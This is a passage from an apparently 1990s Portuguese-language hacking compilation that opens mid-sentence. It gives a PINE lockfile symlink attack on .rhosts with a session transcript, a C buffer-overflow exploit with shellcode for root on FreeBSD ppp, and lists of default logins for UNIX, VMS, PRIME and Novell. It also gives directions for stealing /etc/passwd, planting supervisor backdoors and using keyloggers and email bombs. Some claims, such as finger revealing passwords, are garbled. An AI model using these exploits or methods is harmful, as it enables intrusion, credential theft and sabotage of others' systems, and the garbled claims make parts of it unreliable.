simbólico de /tmp/.hamors_lockfile to ~hamors/.rhosts (para um exmplo) causando o PINE a criar ~hamors/.rhostos como um arquivo 666 com o processo PINE isto é como contente. Uma simples coisa para fazer no echo "+ +" > /tmp.hamors_lockfile, then rm /tmp/.hamors_lockfile. Isto foi escrito por Sean B. Hamor. Para este exmplo, hamors é a vítima e catluvr é o "atacante": hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors agora em outro, este é o último que vou mostrar. Scripts Exploits para o vulnerabilidade ppp é descrita por não sei, isto NÃO é uma FreeBSD-SA-96:15.Funciona no FreeBSD, foi testado. Mexa com os números se isso não funcionar. Abaixo, como configurá-lo: #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Agora quevc tem o root pegue o passwd no /etc faz um backdoor no sistema e seje feliz. :P

Hackear PC

Como Hackear um PC Hack PC Password do BIOS Password do Windows Password do screen saver do Windows Proteção de documentos do Word Proteção de arquivos ZIP Proteção de arquivos ARJ Copiando digitações ou macros de um micro Um editor hexadecimal Escondendo informações Bios Password Para quebrar o password do BIOS você pode encontrar duas situações: 1- Se você pegar o computador depois que o password foi passado corretamente, use um desses programas: amipsw.com (230b) ami.com (555b) aw.com (1,83k) amidecod.com (1,79k) 2- Se você pegar o computador desligado ou esquecer o password: - Ligue o micro e entre o setup; - Anote TODOS os dados em um papel; - Desligue e abra a CPU; - Ache uma bateria na motherboard e retire-a; - Espere uns 20 minutos e recoloque a bateria; - Ligue o micro novamente e entre no setup; - Re-configure todos os dados que você anotou. Password do Windows Para quebrar o password do Windows 3.x você deve digitar "ctrl+alt+del" e depois "enter" quando aparecer a caixa de verificação. Depois que você passou opassword, edite o arquivo win.ini e apague as linhas "load=" e "run=". Para quebrar o password no WIN95: 1 - Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema vai entrar. 2 - Se a caixa de verificação for Windows Password, digite"ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=". Screen Saver Password Para retirar o password de Screen Saver do Windows 3.x você deve editar o arquivo control.ini, apagando tudo o que tiver na area do password. Para retirar o password do Screen Saver do WIN95, renomeie todos os arquivos de extensão .pwl do diretório do windows. Anote os nomes alterados em um papel para eventuais problemas. Dica enviada por JACKFORCE : Para desligar o screen saver sem ter o password no win 3.1 (ainda não foi testado no 3.11 ou no WIN95), aperte ctrl+alt+del e enter várias vezes que o screen saver é fechado. Proteção de Documentos Word Para retirar a proteção dos documentos do word use esse programa: wfwcd.zip (19,8k) Password do ZIP Para quebrar o password de arquivos ZIP use esse programa: zipcrack.zip (12,3k) Password do ARJ Para quebrar o password de arquivos ARJ use esse programa: brkarj10.zip (13,1k) Copiando Digitações Para copiar teclas digitadas de um micro como passwords ou logins use um desses programas: keycopy.zip - DOS - (3,31k) keytrap.zip - WIN95 - (36,0k) Hexadecimal Para quebrar alguns pogramas, passwords ou códigos de entrada, é bom que você tenha em mãos um bom programa editor de hexadecimal. Ele tamb;em é utilizado para remover os numeros seriais de programas como ACDSee 9.0 e etc... Hex Workshop 32bits (375k) Escondendo Informações Para esconder informações ou até pequenos arquivos em arquivos de imagem do tipo .GIF (Compuserve), use esse programa: Hide and Seek v. 4.1 (82,5k) Hack Modem Encontrando o sistema Sistemas UNIX Sistemas VAX/VMS Sistemas PRIME Rede Novell Passwords muito utilizados E-mail Encontrando o Sistema Para encontrar um computador com o sistema, você deve procurar pelas linhas com um programa chamado War Dialer, ou se conectar via Telenet ou outro sistema de interligação de computadores. War Dialer: VMB Hacker (40,7k) Sistemas UNIX 1. Entrando no sistema - Para entrar no sistema, você deve entrar com um "login", que pode ter de 1 a 8 dígitos e um password que pode ter de 6 a 8 dígitos. Dai você tem três saídas: 1. Arrumar a lista de passwords com um hacker 2. Tentar entrar com os defaults 3. Ver quem está on-line com os comandos: who, rwho, finger; e tentar entrar com seus logins mais tarde. Defaults são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo. Login: Password: root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo 2. Dentro do sistema: Dentro do sistema, a primeira coisa que você deve fazer é copiar o arquivo da lista de passwords. Ele se está em: /etc/passwd. Nesse arquivo, você vai encontrar as informações na seguinte sintaxe: username:password:UserID:GroupID:descrição ou nome:homedir:shell Ex.: fou:234abc56:7148:34:Fausto Morais:/home/dir/fou:/bin/fou Username: fou Encrypted Password: 234abc56 User Number: 7148 Group Number: 34 Other Information: Fausto Morais Home Directory: /home/dir/fou Shell: /bin/fou Esse arquivo muito provávelmente estará encriptado. O password estará escondido e, sem um programa para decriptá-la, a lista será inútil. O programa de decriptação do password UNIX, trabalha em cima de um dicionário pré moldado, comparando as palavras com o texto encriptado. É bom lembrar que o Brute Force não irá decriptar a lista. Ele irá tentar comparar palavras encriptadas por uma lista de nomes com a lista de passwords. Quando ele encontrar semelhanças (ex. duas palavras igusia com a mesma decriptação) ele para e dá a lista pronta. Brute Force (14,4k) Dictionary Maker (7,73k) Antes de usar o programa decriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema. Ex.: fou::7148:34:Fausto Morais:/home/dir/fou:/bin/fou Depois da lista de passwords, pegue os seguintes arquivos: /etc/group - É a lista de newsgroups e seus passwords também encriptados. sintaxe - groupname:password:group id:users in group /etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telenet ou rlogin. /usr/mail/ - É onde estão guardadas as mensagens de cada usuário. Sistema VAX/VMS Para entrar no sistema VAX/VMS, você deve proceder da mesma maneira que fez no UNIX: Arrume a lista de passwords, entre com o login de alguém ou tente os defaults. Username: Password: system operator system manager system system system syslib operator operator systets uetp systest systest systest test sysmaint sysmaint sysmaint service sysmaint digital field field field service guest guest guest sem password demo demo demo sem password test test decnet decnet Dentro do sistema não há muito o que fazer. Você pode tentar pegar a lista de passwords em: SYS$SYSTEM:SYSUAF.DAT, mas normalmente, ela não está disponível para os usuários Tome muito cuidado quando tentar quebrar o sistema VAX's, pois ele guarda todos os bad logins e bad passwords, podendo rastreá-lo na sua próxima tentativa. Se você quiser mesmo tentar, entre com alguns passwords em um dia, espere e tente novamente no dia seguinte... Sistema PRIME Para entrar no sistema PRIME você deverá fazer as mesmas coisas que fez no UNIX e no VAX's. Username: Password: prime prime primos primos primos prime primos_cs prime primos_cs primos primenet primenet system system system prime system primos netlink netlink test test guest guest guest1 guest Rede Novell 1. Entrando no Sistema - Para quebrar a rede Novell você deve utilizar os mesmos recursos que usou para entrar nos sistemas UNIX ou VAX's. Na Novell você também pode tentar alguns defaults. Os defaults da rede Novell são usados para a conexão com portas externas como impressoras, fax e etc..., todos sem password. Abaixo estão alguns defaults: Login: superisor guest admin user_template print laser hp_laser printer laserwriter post mail gateway gate router backup wangtek fax faxuser faxworks test archivist chey_archsvr windows_passthru Se você conseguir entrar com esses defaults, você pode conseguir a lista com os logins verdadeiros fazendo o seguinte: vá ao diretório SYS:PUBLIC, digite SYSCON e dê enter. Então vá a User Information e veja a lista com todos os logins desse servidor. Esses logins só poderão ser utilizados se estiverem sem password, pois a lista só mostra os nomes. Nunca tente chutar o password de um usuário, pois o computador armazena o numero de vezes que uma senha foi digitada errada e manda para o usuário verdadeiro quando ele se conecta. Esse sistema de segurança se chama Intruder Detection. Se você não conseguir entrar com esses logins, faça o seguinte: no prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e escreva CX /T /A /R. Com isso você, provavelmente conseguirá a lista dos usuários. 2. Conseguindo Supe Acess - Para conseguir um acesso Supervisor, que é muito importante para fazer uma backdoor ou utilizar outros recursos use esse programa: nw-hack.zip (25,8k) Os problemas de usar o nw-hack são os seguintes: O password Supervisor é mudado para SUPER_HACKER; Todas as contas no servidor tem acesso Supervisor; o administrador do sistema logo saberá que você entrou na rede e acabará com os previlégios do acesso Supervisor mudando também seu password. A única coisa que você pode fazer é deixar uma backdoor ou "porta dos fundos". 3. Deixando uma Porta dos Fundos - Uma porta dos fundos com previlégios de acesso Supervisor é como uma assinatura grátis. Para fazer isso, você deve utilizar o seguinte programa: super.zip (31,3k) Esse programa foi escrito exatamente para deixar o usuário desligar e ligar o acesso Supervisor na hora que quiser. Faça então o seguinte: Consiga aceso Supervisor com o nw-hacker; Ligue sua conta para supe equivalency com o super.exe; Se você ganhar acesso Supervisor, dê supe equivalency a algum dos defaults (Guest, test, archivist, chey_archsvr...); Saia e entre na rede com o default que você deu a supe equivalency e ligue o acesso Supervisor com o super.exe; Saia e entre novamente com o login que você utilizou primeiro; Remova o acesso Supervisor. Agora o default que você escolheu pode ser ligado e desligado por você, na hora que você quiser para ter acesso Supervisor. Passwords Se não houver outro jeito e você precisar chutar os passwords, chute com inteligência e não vá começando: aaa, aab, aac, aad ... Os passwords mais utilizados aqui no Brasil são: Times de futebol; Telefone; Sobrenome; Nome de computadores (pentium, ibm, etc são encontrados com frequência); Apelidos; Nome de pessoas famosas; Passwords de teclas seguidas. Ex.: qwerty, asdfgh, zxcvbn ou aaa, bbb, ccc. O usuário que usa desse tipo de password não pensaem hackers quebrando sua senha e sim na velocidade para dar login. Por isso, quando você escolher seu password, faça uma mesclagem de letras e números. Ex. mouse/1997 - m1o9u9s7e. Parece óbvio, mas ninguém vai chutar um password desse tipo quando tentar quebrar seu login. E-mail Nesta sessão você encontrará arquivos para enviar e-mails bombs, e-mail sem remetente e os famosos PGPs. Unabomb (59,9k) Para bombear o e-mail de alguém. Upyours 3.0 (+-2Mb) Link para o melhor programa de e-mail bomb Anonimail (71,3k) Para enviar e-mails anônimos AEgis Shell for PGP (2,6Mb) Link para um dos melhores programas de encriptação Se você quiser enviar um E-Mail para Usenet, mande a mensagem para @, por exemplo. Grupo: fou.morais Gateway: news.demon.co.uk Endereço: fou.morais@news.demon.co.uk Abaixo está uma lista com alguns gateways: group.name@news.demon.co.uk group.name@charm.magnus.acs.ohio-state.edu group.name@undergrad.math.uwaterloo.ca group.name@nic.funet.fi group.name.usenet@decwrl.dec.com Para escrever essa sessão, foram tomados como base os seguintes documentos: The PC Hacking FAQ Por: Olcay Cirit BASIC NETWORKING Por: Sk8 The SkinHead alt.2600 FAQ, Beta 013 Por: Vários Autores

Hackeando Sites!

HACKEANDO SITES DERRUBAÇÃO E INVASÃO: Para que este truque funcione vc precisa entender um pouco sobre Exploits (principalmente na área de pigns e nukes). Para que vc consiga hackear um site, deve primeiro tentar pinga-lo ou derrubalo. Isto não é fácil partindo do ponto que para derruba rum servidor seu modem precisa ser mais forte do que o dele. Se vc conseguir derrubar o site desejado, após derrubar tente hackear o site. OBS: A pessoa que escreveu este texto acima, nunca deve ter ouvido falar em NT LAG. Nt Lag é um tipo de ataque D.O.S que permite você derrubar um servidor NT. Muitas HPs de sites como a do meu colégio por exemplo (que eu mesmo já hackeei, óbvio que eu não fui burro de mexer em nada) são controladas via NT, ou seja, eu poderia fazer o método acima, e antes eu derrubaria por NT Lag (porém não usei este método de derrubar e invadir) LOCALIZAR/COMPUTADOR: Este é um método que se feito direito poderar dar certo. Antes verifique se você fez aquele negócio de renomear o arquivo vnbt.386 para vnbt.bak do c:\windows\system, que impede você de ser nukado. Caso você tenha feito isto, volte o arquivo vnbt.bak para vnbt.386. Este truque p/ renomeação nem é grande coisa. Eu prefiro invadir sites, do que ter uma prteçãozinha para nuke barata. Agora você irá precisar de um Adaptador para a rede dial Up do windows versão 2.0. Eu não sei onde encontra-lo, caso você ache ou sabe onde encontra-lo me avise por favor. Eu tinha ele só que perdi. Agora em diante siga todos os passos daquele texto sobre invasão por ip lançado na net. Você só não precisa ligar o compartilhamento de arquivos e impressoras, por que o que aquela fez ao escrever isso, é que todos tivessem o compartilhamento ligado e ficasse a maior zona p/ q todos zoassem. Depois que você fez tudo aquilo que tava naquele texto, vá no INICIAR/LOCALIZAR/COMPUTADOR e coloque o ip da sua vítima lá. Vo lembrar a você que só conseguirá invadir sites que são controlados por Windows NT, e que se ele for controlado por qualquer outro sistema você irá precisar da senha para logar. A senha você poderá conseguir dando um finger. FINGER: Muitos sites deixam aberto a porta de finger. Finger é uma porta que possui os dados dos ultimos logs no servidor. Pegue o ip do site, e um programa de finger. Depois disso abra o programa de finger e coloque o usuário da qual você quer o ultimo log seguido do ip por exemplo root@200.210.255.13. Vai aparecer o login e a senha. Agora abra o telnet e conecte no servidor pela porta 80. Entre com o login e a senha que o finger te deu. Pronto você entrou. OBS: Isso só da certo se o server tiver o finger abilitado.